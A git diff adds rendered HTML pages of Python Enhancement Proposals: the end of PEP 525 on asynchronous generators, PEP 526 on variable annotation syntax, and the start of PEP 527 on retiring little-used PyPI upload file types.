When an asynchronous generator is iterated for the first time, +it stores a reference to the current finalizer.

+

When an asynchronous generator is about to be garbage collected, +it calls its cached finalizer. The assumption is that the finalizer +will schedule an aclose() call with the loop that was active +when the iteration started.

+

For instance, here is how asyncio is modified to allow safe +finalization of asynchronous generators:

+
# asyncio/base_events.py
+
+class BaseEventLoop:
+
+    def run_forever(self):
+        ...
+        old_hooks = sys.get_asyncgen_hooks()
+        sys.set_asyncgen_hooks(finalizer=self._finalize_asyncgen)
+        try:
+            ...
+        finally:
+            sys.set_asyncgen_hooks(*old_hooks)
+            ...
+
+    def _finalize_asyncgen(self, gen):
+        self.create_task(gen.aclose())
+
+
+

The second argument, firstiter, allows event loops to maintain +a weak set of asynchronous generators instantiated under their control. +This makes it possible to implement “shutdown” mechanisms to safely +finalize all open generators and close the event loop.

+

sys.set_asyncgen_hooks() is thread-specific, so several event +loops running in parallel threads can use it safely.

+

sys.get_asyncgen_hooks() returns a namedtuple-like structure +with firstiter and finalizer fields.

+
+
+

asyncio

+

The asyncio event loop will use sys.set_asyncgen_hooks() API to +maintain a weak set of all scheduled asynchronous generators, and to +schedule their aclose() coroutine methods when it is time for +generators to be GCed.

+

To make sure that asyncio programs can finalize all scheduled +asynchronous generators reliably, we propose to add a new event loop +coroutine method loop.shutdown_asyncgens(). The method will +schedule all currently open asynchronous generators to close with an +aclose() call.

+

After calling the loop.shutdown_asyncgens() method, the event loop +will issue a warning whenever a new asynchronous generator is iterated +for the first time. The idea is that after requesting all asynchronous +generators to be shutdown, the program should not execute code that +iterates over new asynchronous generators.

+

An example of how shutdown_asyncgens coroutine should be used:

+
try:
+    loop.run_forever()
+finally:
+    loop.run_until_complete(loop.shutdown_asyncgens())
+    loop.close()
+
+
+
+
+

Asynchronous Generator Object

+

The object is modeled after the standard Python generator object. +Essentially, the behaviour of asynchronous generators is designed +to replicate the behaviour of synchronous generators, with the only +difference in that the API is asynchronous.

+

The following methods and properties are defined:

+
    +
  1. agen.__aiter__(): Returns agen.
  2. +
  3. agen.__anext__(): Returns an awaitable, that performs one +asynchronous generator iteration when awaited.
  4. +
  5. agen.asend(val): Returns an awaitable, that pushes the +val object in the agen generator. When the agen has +not yet been iterated, val must be None.

    Example:

    +
    async def gen():
    +    await asyncio.sleep(0.1)
    +    v = yield 42
    +    print(v)
    +    await asyncio.sleep(0.2)
    +
    +g = gen()
    +
    +await g.asend(None)      # Will return 42 after sleeping
    +                         # for 0.1 seconds.
    +
    +await g.asend('hello')   # Will print 'hello' and
    +                         # raise StopAsyncIteration
    +                         # (after sleeping for 0.2 seconds.)
    +
    +
    +
  6. +
  7. agen.athrow(typ, [val, [tb]]): Returns an awaitable, that +throws an exception into the agen generator.

    Example:

    +
    async def gen():
    +    try:
    +        await asyncio.sleep(0.1)
    +        yield 'hello'
    +    except ZeroDivisionError:
    +        await asyncio.sleep(0.2)
    +        yield 'world'
    +
    +g = gen()
    +v = await g.asend(None)
    +print(v)                # Will print 'hello' after
    +                        # sleeping for 0.1 seconds.
    +
    +v = await g.athrow(ZeroDivisionError)
    +print(v)                # Will print 'world' after
    +                        # sleeping 0.2 seconds.
    +
    +
    +
  8. +
  9. agen.aclose(): Returns an awaitable, that throws a +GeneratorExit exception into the generator. The awaitable can +either return a yielded value, if agen handled the exception, +or agen will be closed and the exception will propagate back +to the caller.
  10. +
  11. agen.__name__ and agen.__qualname__: readable and writable +name and qualified name attributes.
  12. +
  13. agen.ag_await: The object that agen is currently awaiting +on, or None. This is similar to the currently available +gi_yieldfrom for generators and cr_await for coroutines.
  14. +
  15. agen.ag_frame, agen.ag_running, and agen.ag_code: +defined in the same way as similar attributes of standard generators.
  16. +
+

StopIteration and StopAsyncIteration are not propagated out of +asynchronous generators, and are replaced with a RuntimeError.

+
+
+

Implementation Details

+

Asynchronous generator object (PyAsyncGenObject) shares the +struct layout with PyGenObject. In addition to that, the +reference implementation introduces three new objects:

+
    +
  1. PyAsyncGenASend: the awaitable object that implements +__anext__ and asend() methods.
  2. +
  3. PyAsyncGenAThrow: the awaitable object that implements +athrow() and aclose() methods.
  4. +
  5. _PyAsyncGenWrappedValue: every directly yielded object from an +asynchronous generator is implicitly boxed into this structure. This +is how the generator implementation can separate objects that are +yielded using regular iteration protocol from objects that are +yielded using asynchronous iteration protocol.
  6. +
+

PyAsyncGenASend and PyAsyncGenAThrow are awaitables (they have +__await__ methods returning self) and are coroutine-like objects +(implementing __iter__, __next__, send() and throw() +methods). Essentially, they control how asynchronous generators are +iterated:

+../_images/pep-0525-1.png + +
+

PyAsyncGenASend and PyAsyncGenAThrow

+

PyAsyncGenASend is a coroutine-like object that drives __anext__ +and asend() methods and implements the asynchronous iteration +protocol.

+

agen.asend(val) and agen.__anext__() return instances of +PyAsyncGenASend (which hold references back to the parent +agen object.)

+

The data flow is defined as follows:

+
    +
  1. When PyAsyncGenASend.send(val) is called for the first time, +val is pushed to the parent agen object (using existing +facilities of PyGenObject.)

    Subsequent iterations over the PyAsyncGenASend objects, push +None to agen.

    +

    When a _PyAsyncGenWrappedValue object is yielded, it +is unboxed, and a StopIteration exception is raised with the +unwrapped value as an argument.

    +
  2. +
  3. When PyAsyncGenASend.throw(*exc) is called for the first time, +*exc is thrown into the parent agen object.

    Subsequent iterations over the PyAsyncGenASend objects, push +None to agen.

    +

    When a _PyAsyncGenWrappedValue object is yielded, it +is unboxed, and a StopIteration exception is raised with the +unwrapped value as an argument.

    +
  4. +
  5. return statements in asynchronous generators raise +StopAsyncIteration exception, which is propagated through +PyAsyncGenASend.send() and PyAsyncGenASend.throw() methods.
  6. +
+

PyAsyncGenAThrow is very similar to PyAsyncGenASend. The only +difference is that PyAsyncGenAThrow.send(), when called first time, +throws an exception into the parent agen object (instead of pushing +a value into it.)

+
+
+
+

New Standard Library Functions and Types

+
    +
  1. types.AsyncGeneratorType – type of asynchronous generator +object.
  2. +
  3. sys.set_asyncgen_hooks() and sys.get_asyncgen_hooks() +methods to set up asynchronous generators finalizers and iteration +interceptors in event loops.
  4. +
  5. inspect.isasyncgen() and inspect.isasyncgenfunction() +introspection functions.
  6. +
  7. New method for asyncio event loop: loop.shutdown_asyncgens().
  8. +
  9. New collections.abc.AsyncGenerator abstract base class.
  10. +
+
+
+

Backwards Compatibility

+

The proposal is fully backwards compatible.

+

In Python 3.5 it is a SyntaxError to define an async def +function with a yield expression inside, therefore it’s safe to +introduce asynchronous generators in 3.6.

+
+
+
+

Performance

+
+

Regular Generators

+

There is no performance degradation for regular generators. +The following micro benchmark runs at the same speed on CPython with +and without asynchronous generators:

+
def gen():
+    i = 0
+    while i < 100000000:
+        yield i
+        i += 1
+
+list(gen())
+
+
+
+
+

Improvements over asynchronous iterators

+

The following micro-benchmark shows that asynchronous generators +are about 2.3x faster than asynchronous iterators implemented in +pure Python:

+
N = 10 ** 7
+
+async def agen():
+    for i in range(N):
+        yield i
+
+class AIter:
+    def __init__(self):
+        self.i = 0
+
+    def __aiter__(self):
+        return self
+
+    async def __anext__(self):
+        i = self.i
+        if i >= N:
+            raise StopAsyncIteration
+        self.i += 1
+        return i
+
+
+
+
+
+

Design Considerations

+
+

aiter() and anext() builtins

+

Originally, PEP 492 defined __aiter__ as a method that should +return an awaitable object, resulting in an asynchronous iterator.

+

However, in CPython 3.5.2, __aiter__ was redefined to return +asynchronous iterators directly. To avoid breaking backwards +compatibility, it was decided that Python 3.6 will support both +ways: __aiter__ can still return an awaitable with +a DeprecationWarning being issued.

+

Because of this dual nature of __aiter__ in Python 3.6, we cannot +add a synchronous implementation of aiter() built-in. Therefore, +it is proposed to wait until Python 3.7.

+
+
+

Asynchronous list/dict/set comprehensions

+

Syntax for asynchronous comprehensions is unrelated to the asynchronous +generators machinery, and should be considered in a separate PEP.

+
+
+

Asynchronous yield from

+

While it is theoretically possible to implement yield from support +for asynchronous generators, it would require a serious redesign of the +generators implementation.

+

yield from is also less critical for asynchronous generators, since +there is no need provide a mechanism of implementing another coroutines +protocol on top of coroutines. And to compose asynchronous generators a +simple async for loop can be used:

+
async def g1():
+    yield 1
+    yield 2
+
+async def g2():
+    async for v in g1():
+        yield v
+
+
+
+
+

Why the asend() and athrow() methods are necessary

+

They make it possible to implement concepts similar to +contextlib.contextmanager using asynchronous generators. +For instance, with the proposed design, it is possible to implement +the following pattern:

+
@async_context_manager
+async def ctx():
+    await open()
+    try:
+        yield
+    finally:
+        await close()
+
+async with ctx():
+    await ...
+
+
+

Another reason is that it is possible to push data and throw exceptions +into asynchronous generators using the object returned from +__anext__ object, but it is hard to do that correctly. Adding +explicit asend() and athrow() will pave a safe way to +accomplish that.

+

In terms of implementation, asend() is a slightly more generic +version of __anext__, and athrow() is very similar to +aclose(). Therefore, having these methods defined for asynchronous +generators does not add any extra complexity.

+
+
+
+

Example

+

A working example with the current reference implementation (will +print numbers from 0 to 9 with one second delay):

+
async def ticker(delay, to):
+    for i in range(to):
+        yield i
+        await asyncio.sleep(delay)
+
+
+async def run():
+    async for i in ticker(1, 10):
+        print(i)
+
+
+import asyncio
+loop = asyncio.get_event_loop()
+try:
+    loop.run_until_complete(run())
+finally:
+    loop.close()
+
+
+
+
+

Acceptance

+

PEP 525 was accepted by Guido, September 6, 2016 [2].

+
+
+

Implementation

+

The implementation is tracked in issue 28003 [3]. The reference +implementation git repository is available at [1].

+
+
+

References

+ +
+
+

Acknowledgments

+

I thank Guido van Rossum, Victor Stinner, Elvis Pranskevichus, +Nathaniel Smith, Łukasz Langa, Andrew Svetlov and many others +for their feedback, code reviews, and discussions around this +PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0525.rst

+

Last modified: 2024-11-06 14:44:58 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0526/index.html b/pep-0526/index.html new file mode 100644 index 00000000000..dcb7a68faa6 --- /dev/null +++ b/pep-0526/index.html @@ -0,0 +1,800 @@ + + + + + + + + PEP 526 – Syntax for Variable Annotations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 526 – Syntax for Variable Annotations

+
+
Author:
+
Ryan Gonzalez <rymg19 at gmail.com>, Philip House <phouse512 at gmail.com>, Ivan Levkivskyi <levkivskyi at gmail.com>, Lisa Roach <lisaroach14 at gmail.com>, Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
09-Aug-2016
+
Python-Version:
+
3.6
+
Post-History:
+
30-Aug-2016, 02-Sep-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Annotated assignment statements, +ClassVar and +typing.ClassVar for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Status

+

This PEP has been provisionally accepted by the BDFL. +See the acceptance message for more color: +https://mail.python.org/pipermail/python-dev/2016-September/146282.html

+
+
+

Notice for Reviewers

+

This PEP was drafted in a separate repo: +https://github.com/phouse512/peps/tree/pep-0526.

+

There was preliminary discussion on python-ideas and at +https://github.com/python/typing/issues/258.

+

Before you bring up an objection in a public forum please at least +read the summary of rejected ideas listed at the end of this PEP.

+
+
+

Abstract

+

PEP 484 introduced type hints, a.k.a. type annotations. While its +main focus was function annotations, it also introduced the notion of +type comments to annotate variables:

+
# 'primes' is a list of integers
+primes = []  # type: List[int]
+
+# 'captain' is a string (Note: initial value is a problem)
+captain = ...  # type: str
+
+class Starship:
+    # 'stats' is a class variable
+    stats = {}  # type: Dict[str, int]
+
+
+

This PEP aims at adding syntax to Python for annotating the types of variables +(including class variables and instance variables), +instead of expressing them through comments:

+
primes: List[int] = []
+
+captain: str  # Note: no initial value!
+
+class Starship:
+    stats: ClassVar[Dict[str, int]] = {}
+
+
+

PEP 484 explicitly states that type comments are intended to help with +type inference in complex cases, and this PEP does not change this +intention. However, since in practice type comments have also been +adopted for class variables and instance variables, this PEP also +discusses the use of type annotations for those variables.

+
+
+

Rationale

+

Although type comments work well enough, the fact that they’re +expressed through comments has some downsides:

+
    +
  • Text editors often highlight comments differently from type annotations.
  • +
  • There’s no way to annotate the type of an undefined variable; one needs to +initialize it to None (e.g. a = None # type: int).
  • +
  • Variables annotated in a conditional branch are difficult to read:
    if some_value:
    +    my_var = function() # type: Logger
    +else:
    +    my_var = another_function() # Why isn't there a type here?
    +
    +
    +
  • +
  • Since type comments aren’t actually part of the language, if a Python script +wants to parse them, it requires a custom parser instead of just using +ast.
  • +
  • Type comments are used a lot in typeshed. Migrating typeshed to use +the variable annotation syntax instead of type comments would improve +readability of stubs.
  • +
  • In situations where normal comments and type comments are used together, it is +difficult to distinguish them:
    path = None  # type: Optional[str]  # Path to module source
    +
    +
    +
  • +
  • It’s impossible to retrieve the annotations at runtime outside of +attempting to find the module’s source code and parse it at runtime, +which is inelegant, to say the least.
  • +
+

The majority of these issues can be alleviated by making the syntax +a core part of the language. Moreover, having a dedicated annotation syntax +for class and instance variables (in addition to method annotations) will +pave the way to static duck-typing as a complement to nominal typing defined +by PEP 484.

+
+

Non-goals

+

While the proposal is accompanied by an extension of the typing.get_type_hints +standard library function for runtime retrieval of annotations, variable +annotations are not designed for runtime type checking. Third party packages +will have to be developed to implement such functionality.

+

It should also be emphasized that Python will remain a dynamically typed +language, and the authors have no desire to ever make type hints mandatory, +even by convention. Type annotations should not be confused with variable +declarations in statically typed languages. The goal of annotation syntax is +to provide an easy way to specify structured type metadata +for third party tools.

+

This PEP does not require type checkers to change their type checking +rules. It merely provides a more readable syntax to replace type +comments.

+
+
+
+

Specification

+

Type annotation can be added to an assignment statement or to a single +expression indicating the desired type of the annotation target to a third +party type checker:

+
my_var: int
+my_var = 5  # Passes type check.
+other_var: int  = 'a'  # Flagged as error by type checker,
+                       # but OK at runtime.
+
+
+

This syntax does not introduce any new semantics beyond PEP 484, so that +the following three statements are equivalent:

+
var = value # type: annotation
+var: annotation; var = value
+var: annotation = value
+
+
+

Below we specify the syntax of type annotations +in different contexts and their runtime effects.

+

We also suggest how type checkers might interpret annotations, but +compliance to these suggestions is not mandatory. (This is in line +with the attitude towards compliance in PEP 484.)

+
+

Global and local variable annotations

+

The types of locals and globals can be annotated as follows:

+
some_number: int           # variable without initial value
+some_list: List[int] = []  # variable with initial value
+
+
+

Being able to omit the initial value allows for easier typing of variables +assigned in conditional branches:

+
sane_world: bool
+if 2+2 == 4:
+    sane_world = True
+else:
+    sane_world = False
+
+
+

Note that, although the syntax does allow tuple packing, it does not allow +one to annotate the types of variables when tuple unpacking is used:

+
# Tuple packing with variable annotation syntax
+t: Tuple[int, ...] = (1, 2, 3)
+# or
+t: Tuple[int, ...] = 1, 2, 3  # This only works in Python 3.8+
+
+# Tuple unpacking with variable annotation syntax
+header: str
+kind: int
+body: Optional[List[str]]
+header, kind, body = message
+
+
+

Omitting the initial value leaves the variable uninitialized:

+
a: int
+print(a)  # raises NameError
+
+
+

However, annotating a local variable will cause the interpreter to always make +it a local:

+
def f():
+    a: int
+    print(a)  # raises UnboundLocalError
+    # Commenting out the a: int makes it a NameError.
+
+
+

as if the code were:

+
def f():
+    if False: a = 0
+    print(a)  # raises UnboundLocalError
+
+
+

Duplicate type annotations will be ignored. However, static type +checkers may issue a warning for annotations of the same variable +by a different type:

+
a: int
+a: str  # Static type checker may or may not warn about this.
+
+
+
+
+

Class and instance variable annotations

+

Type annotations can also be used to annotate class and instance variables +in class bodies and methods. In particular, the value-less notation a: int +allows one to annotate instance variables that should be initialized +in __init__ or __new__. The proposed syntax is as follows:

+
class BasicStarship:
+    captain: str = 'Picard'               # instance variable with default
+    damage: int                           # instance variable without default
+    stats: ClassVar[Dict[str, int]] = {}  # class variable
+
+
+

Here ClassVar is a special class defined by the typing module that +indicates to the static type checker that this variable should not be +set on instances.

+

Note that a ClassVar parameter cannot include any type variables, regardless +of the level of nesting: ClassVar[T] and ClassVar[List[Set[T]]] are +both invalid if T is a type variable.

+

This could be illustrated with a more detailed example. In this class:

+
class Starship:
+    captain = 'Picard'
+    stats = {}
+
+    def __init__(self, damage, captain=None):
+        self.damage = damage
+        if captain:
+            self.captain = captain  # Else keep the default
+
+    def hit(self):
+        Starship.stats['hits'] = Starship.stats.get('hits', 0) + 1
+
+
+

stats is intended to be a class variable (keeping track of many different +per-game statistics), while captain is an instance variable with a default +value set in the class. This difference might not be seen by a type +checker: both get initialized in the class, but captain serves only +as a convenient default value for the instance variable, while stats +is truly a class variable – it is intended to be shared by all instances.

+

Since both variables happen to be initialized at the class level, it is +useful to distinguish them by marking class variables as annotated with +types wrapped in ClassVar[...]. In this way a type checker may flag +accidental assignments to attributes with the same name on instances.

+

For example, annotating the discussed class:

+
class Starship:
+    captain: str = 'Picard'
+    damage: int
+    stats: ClassVar[Dict[str, int]] = {}
+
+    def __init__(self, damage: int, captain: str = None):
+        self.damage = damage
+        if captain:
+            self.captain = captain  # Else keep the default
+
+    def hit(self):
+        Starship.stats['hits'] = Starship.stats.get('hits', 0) + 1
+
+enterprise_d = Starship(3000)
+enterprise_d.stats = {} # Flagged as error by a type checker
+Starship.stats = {} # This is OK
+
+
+

As a matter of convenience (and convention), instance variables can be +annotated in __init__ or other methods, rather than in the class:

+
from typing import Generic, TypeVar
+T = TypeVar('T')
+
+class Box(Generic[T]):
+    def __init__(self, content):
+        self.content: T = content
+
+
+
+
+

Annotating expressions

+

The target of the annotation can be any valid single assignment +target, at least syntactically (it is up to the type checker what to +do with this):

+
class Cls:
+    pass
+
+c = Cls()
+c.x: int = 0  # Annotates c.x with int.
+c.y: int      # Annotates c.y with int.
+
+d = {}
+d['a']: int = 0  # Annotates d['a'] with int.
+d['b']: int      # Annotates d['b'] with int.
+
+
+

Note that even a parenthesized name is considered an expression, +not a simple name:

+
(x): int      # Annotates x with int, (x) treated as expression by compiler.
+(y): int = 0  # Same situation here.
+
+
+
+
+

Where annotations aren’t allowed

+

It is illegal to attempt to annotate variables subject to global +or nonlocal in the same function scope:

+
def f():
+    global x: int  # SyntaxError
+
+def g():
+    x: int  # Also a SyntaxError
+    global x
+
+
+

The reason is that global and nonlocal don’t own variables; +therefore, the type annotations belong in the scope owning the variable.

+

Only single assignment targets and single right hand side values are allowed. +In addition, one cannot annotate variables used in a for or with +statement; they can be annotated ahead of time, in a similar manner to tuple +unpacking:

+
a: int
+for a in my_iter:
+    ...
+
+f: MyFile
+with myfunc() as f:
+    ...
+
+
+
+
+

Variable annotations in stub files

+

As variable annotations are more readable than type comments, they are +preferred in stub files for all versions of Python, including Python 2.7. +Note that stub files are not executed by Python interpreters, and therefore +using variable annotations will not lead to errors. Type checkers should +support variable annotations in stubs for all versions of Python. For example:

+
# file lib.pyi
+
+ADDRESS: unicode = ...
+
+class Error:
+    cause: Union[str, unicode]
+
+
+
+
+

Preferred coding style for variable annotations

+

Annotations for module level variables, class and instance variables, +and local variables should have a single space after corresponding colon. +There should be no space before the colon. If an assignment has right hand +side, then the equality sign should have exactly one space on both sides. +Examples:

+
    +
  • Yes:
    code: int
    +
    +class Point:
    +    coords: Tuple[int, int]
    +    label: str = '<unknown>'
    +
    +
    +
  • +
  • No:
    code:int  # No space after colon
    +code : int  # Space before colon
    +
    +class Test:
    +    result: int=0  # No spaces around equality sign
    +
    +
    +
  • +
+
+
+
+

Changes to Standard Library and Documentation

+
    +
  • A new covariant type ClassVar[T_co] is added to the typing +module. It accepts only a single argument that should be a valid type, +and is used to annotate class variables that should not be set on class +instances. This restriction is ensured by static checkers, +but not at runtime. See the +classvar section for examples and explanations for the usage of +ClassVar, and see the rejected section +for more information on the reasoning behind ClassVar.
  • +
  • Function get_type_hints in the typing module will be extended, +so that one can retrieve type annotations at runtime from modules +and classes as well as functions. +Annotations are returned as a dictionary mapping from variable or arguments +to their type hints with forward references evaluated. +For classes it returns a mapping (perhaps collections.ChainMap) +constructed from annotations in method resolution order.
  • +
  • Recommended guidelines for using annotations will be added to the +documentation, containing a pedagogical recapitulation of specifications +described in this PEP and in PEP 484. In addition, a helper script for +translating type comments into type annotations will be published +separately from the standard library.
  • +
+
+
+

Runtime Effects of Type Annotations

+

Annotating a local variable will cause +the interpreter to treat it as a local, even if it was never assigned to. +Annotations for local variables will not be evaluated:

+
def f():
+    x: NonexistentName  # No error.
+
+
+

However, if it is at a module or class level, then the type will be +evaluated:

+
x: NonexistentName  # Error!
+class X:
+    var: NonexistentName  # Error!
+
+
+

In addition, at the module or class level, if the item being annotated is a +simple name, then it and the annotation will be stored in the +__annotations__ attribute of that module or class (mangled if private) +as an ordered mapping from names to evaluated annotations. +Here is an example:

+
from typing import Dict
+class Player:
+    ...
+players: Dict[str, Player]
+__points: int
+
+print(__annotations__)
+# prints: {'players': typing.Dict[str, __main__.Player],
+#          '_Player__points': <class 'int'>}
+
+
+

__annotations__ is writable, so this is permitted:

+
__annotations__['s'] = str
+
+
+

But attempting to update __annotations__ to something other than an +ordered mapping may result in a TypeError:

+
class C:
+    __annotations__ = 42
+    x: int = 5  # raises TypeError
+
+
+

(Note that the assignment to __annotations__, which is the +culprit, is accepted by the Python interpreter without questioning it +– but the subsequent type annotation expects it to be a +MutableMapping and will fail.)

+

The recommended way of getting annotations at runtime is by using +typing.get_type_hints function; as with all dunder attributes, +any undocumented use of __annotations__ is subject to breakage +without warning:

+
from typing import Dict, ClassVar, get_type_hints
+class Starship:
+    hitpoints: int = 50
+    stats: ClassVar[Dict[str, int]] = {}
+    shield: int = 100
+    captain: str
+    def __init__(self, captain: str) -> None:
+        ...
+
+assert get_type_hints(Starship) == {'hitpoints': int,
+                                    'stats': ClassVar[Dict[str, int]],
+                                    'shield': int,
+                                    'captain': str}
+
+assert get_type_hints(Starship.__init__) == {'captain': str,
+                                             'return': None}
+
+
+

Note that if annotations are not found statically, then the +__annotations__ dictionary is not created at all. Also the +value of having annotations available locally does not offset +the cost of having to create and populate the annotations dictionary +on every function call. Therefore, annotations at function level are +not evaluated and not stored.

+
+

Other uses of annotations

+

While Python with this PEP will not object to:

+
alice: 'well done' = 'A+'
+bob: 'what a shame' = 'F-'
+
+
+

since it will not care about the type annotation beyond “it evaluates +without raising”, a type checker that encounters it will flag it, +unless disabled with # type: ignore or @no_type_check.

+

However, since Python won’t care what the “type” is, +if the above snippet is at the global level or in a class, __annotations__ +will include {'alice': 'well done', 'bob': 'what a shame'}.

+

These stored annotations might be used for other purposes, +but with this PEP we explicitly recommend type hinting as the +preferred use of annotations.

+
+
+
+

Rejected/Postponed Proposals

+
    +
  • Should we introduce variable annotations at all? +Variable annotations have already been around for almost two years +in the form of type comments, sanctioned by PEP 484. They are +extensively used by third party type checkers (mypy, pytype, +PyCharm, etc.) and by projects using the type checkers. However, the +comment syntax has many downsides listed in Rationale. This PEP is +not about the need for type annotations, it is about what should be +the syntax for such annotations.
  • +
  • Introduce a new keyword: +The choice of a good keyword is hard, +e.g. it can’t be var because that is way too common a variable name, +and it can’t be local if we want to use it for class variables or +globals. Second, no matter what we choose, we’d still need +a __future__ import.
  • +
  • Use def as a keyword: +The proposal would be:
    def primes: List[int] = []
    +def captain: str
    +
    +
    +

    The problem with this is that def means “define a function” to +generations of Python programmers (and tools!), and using it also to +define variables does not increase clarity. (Though this is of +course subjective.)

    +
  • +
  • Use function based syntax: +It was proposed to annotate types of variables using +var = cast(annotation[, value]). Although this syntax +alleviates some problems with type comments like absence of the annotation +in AST, it does not solve other problems such as readability +and it introduces possible runtime overhead.
  • +
  • Allow type annotations for tuple unpacking: +This causes ambiguity: it’s not clear what this statement means:
    x, y: T
    +
    +
    +

    Are x and y both of type T, or do we expect T to be +a tuple type of two items that are distributed over x and y, +or perhaps x has type Any and y has type T? (The +latter is what this would mean if this occurred in a function +signature.) Rather than leave the (human) reader guessing, we +forbid this, at least for now.

    +
  • +
  • Parenthesized form (var: type) for annotations: +It was brought up on python-ideas as a remedy for the above-mentioned +ambiguity, but it was rejected since such syntax would be hairy, +the benefits are slight, and the readability would be poor.
  • +
  • Allow annotations in chained assignments: +This has problems of ambiguity and readability similar to tuple +unpacking, for example in:
    x: int = y = 1
    +z = w: int = 1
    +
    +
    +

    it is ambiguous, what should the types of y and z be? +Also the second line is difficult to parse.

    +
  • +
  • Allow annotations in with and for statement: +This was rejected because in for it would make it hard to spot the actual +iterable, and in with it would confuse the CPython’s LL(1) parser.
  • +
  • Evaluate local annotations at function definition time: +This has been rejected by Guido because the placement of the annotation +strongly suggests that it’s in the same scope as the surrounding code.
  • +
  • Store variable annotations also in function scope: +The value of having the annotations available locally is just not enough +to significantly offset the cost of creating and populating the dictionary +on each function call.
  • +
  • Initialize variables annotated without assignment: +It was proposed on python-ideas to initialize x in x: int to +None or to an additional special constant like Javascript’s +undefined. However, adding yet another singleton value to the language +would needed to be checked for everywhere in the code. Therefore, +Guido just said plain “No” to this.
  • +
  • Add also InstanceVar to the typing module: +This is redundant because instance variables are way more common than +class variables. The more common usage deserves to be the default.
  • +
  • Allow instance variable annotations only in methods: +The problem is that many __init__ methods do a lot of things besides +initializing instance variables, and it would be harder (for a human) +to find all the instance variable annotations. +And sometimes __init__ is factored into more helper methods +so it’s even harder to chase them down. Putting the instance variable +annotations together in the class makes it easier to find them, +and helps a first-time reader of the code.
  • +
  • Use syntax x: class t = v for class variables: +This would require a more complicated parser and the class +keyword would confuse simple-minded syntax highlighters. Anyway we +need to have ClassVar store class variables to +__annotations__, so a simpler syntax was chosen.
  • +
  • Forget about ClassVar altogether: +This was proposed since mypy seems to be getting along fine without a way +to distinguish between class and instance variables. But a type checker +can do useful things with the extra information, for example flag +accidental assignments to a class variable via the instance +(which would create an instance variable shadowing the class variable). +It could also flag instance variables with mutable defaults, +a well-known hazard.
  • +
  • Use ClassAttr instead of ClassVar: +The main reason why ClassVar is better is following: many things are +class attributes, e.g. methods, descriptors, etc. But only specific +attributes are conceptually class variables (or maybe constants).
  • +
  • Do not evaluate annotations, treat them as strings: +This would be inconsistent with the behavior of function annotations that +are always evaluated. Although this might be reconsidered in future, +it was decided in PEP 484 that this would have to be a separate PEP.
  • +
  • Annotate variable types in class docstring: +Many projects already use various docstring conventions, often without +much consistency and generally without conforming to the PEP 484 annotation +syntax yet. Also this would require a special sophisticated parser. +This, in turn, would defeat the purpose of the PEP – +collaborating with the third party type checking tools.
  • +
  • Implement __annotations__ as a descriptor: +This was proposed to prohibit setting __annotations__ to something +non-dictionary or non-None. Guido has rejected this idea as unnecessary; +instead a TypeError will be raised if an attempt is made to update +__annotations__ when it is anything other than a mapping.
  • +
  • Treating bare annotations the same as global or nonlocal: +The rejected proposal would prefer that the presence of an +annotation without assignment in a function body should not involve +any evaluation. In contrast, the PEP implies that if the target +is more complex than a single name, its “left-hand part” should be +evaluated at the point where it occurs in the function body, just to +enforce that it is defined. For example, in this example:
    def foo(self):
    +    slef.name: str
    +
    +
    +

    the name slef should be evaluated, just so that if it is not +defined (as is likely in this example :-), the error will be caught +at runtime. This is more in line with what happens when there is +an initial value, and thus is expected to lead to fewer surprises. +(Also note that if the target was self.name (this time correctly +spelled :-), an optimizing compiler has no obligation to evaluate +self as long as it can prove that it will definitely be +defined.)

    +
  • +
+
+
+

Backwards Compatibility

+

This PEP is fully backwards compatible.

+
+
+

Implementation

+

An implementation for Python 3.6 can be found +on GitHub.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0526.rst

+

Last modified: 2024-10-09 11:37:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0527/index.html b/pep-0527/index.html new file mode 100644 index 00000000000..4714b873994 --- /dev/null +++ b/pep-0527/index.html @@ -0,0 +1,354 @@ + + + + + + + + PEP 527 – Removing Un(der)used file types/extensions on PyPI | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 527 – Removing Un(der)used file types/extensions on PyPI

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
23-Aug-2016
+
Post-History:
+
23-Aug-2016
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP recommends deprecating, and ultimately removing, support for uploading +certain unused or under used file types and extensions to PyPI. In particular +it recommends disallowing further uploads of any files of the types +bdist_dumb, bdist_rpm, bdist_dmg, bdist_msi, and +bdist_wininst, leaving PyPI to only accept new uploads of the sdist, +bdist_wheel, and bdist_egg file types.

+

In addition, this PEP proposes removing support for new uploads of sdists using +the .tar, .tar.bz2, .tar.xz, .tar.Z, .tgz, .tbz, and +any other extension besides .tar.gz and .zip.

+

Finally, this PEP also proposes limiting the number of allowed sdist uploads +for each individual release of a project on PyPI to one instead of one for each +allowed extension.

+
+
+

Rationale

+
+

File Formats

+

Currently PyPI supports the following file types:

+
    +
  • sdist
  • +
  • bdist_wheel
  • +
  • bdist_egg
  • +
  • bdist_wininst
  • +
  • bdist_msi
  • +
  • bdist_dmg
  • +
  • bdist_rpm
  • +
  • bdist_dumb
  • +
+

However, these different types of files have varying amounts of usefulness or +general use in the ecosystem. Continuing to support them adds a maintenance +burden on PyPI as well as tool authors and incurs a cost in both bandwidth and +disk space not only on PyPI itself, but also on any mirrors of PyPI.

+

